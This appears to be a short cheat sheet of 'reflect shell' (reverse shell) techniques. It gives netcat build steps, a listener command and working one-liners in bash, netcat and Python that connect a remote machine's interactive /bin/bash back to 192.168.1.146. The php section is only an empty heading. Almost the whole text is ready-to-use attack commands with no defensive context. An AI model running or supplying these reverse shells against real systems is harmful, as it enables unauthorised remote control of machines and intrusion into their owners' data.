# 1. reflect shell
# https://www.jianshu.com/p/6aca9b29514d
# 
# 1.1 download netcat
visit https://sourceforge.net/projects/netcat/files/netcat/0.7.1/
download .tar.gz, uncompress, configure, make, then you will get "netcat" under src folder

# 1.2 on local machine A , start netcat on local 3389
nc -lvp 3389

# 1.3 on remote machine B, use bash or netcat or python or php to reflect shell
(1) bash
bash -i >& /dev/tcp/192.168.1.146/3389 0>&1

(2) nc
nc -e /bin/bash 192.168.1.146 7777

(3) python
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.1.146',3389));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

(4) php


 
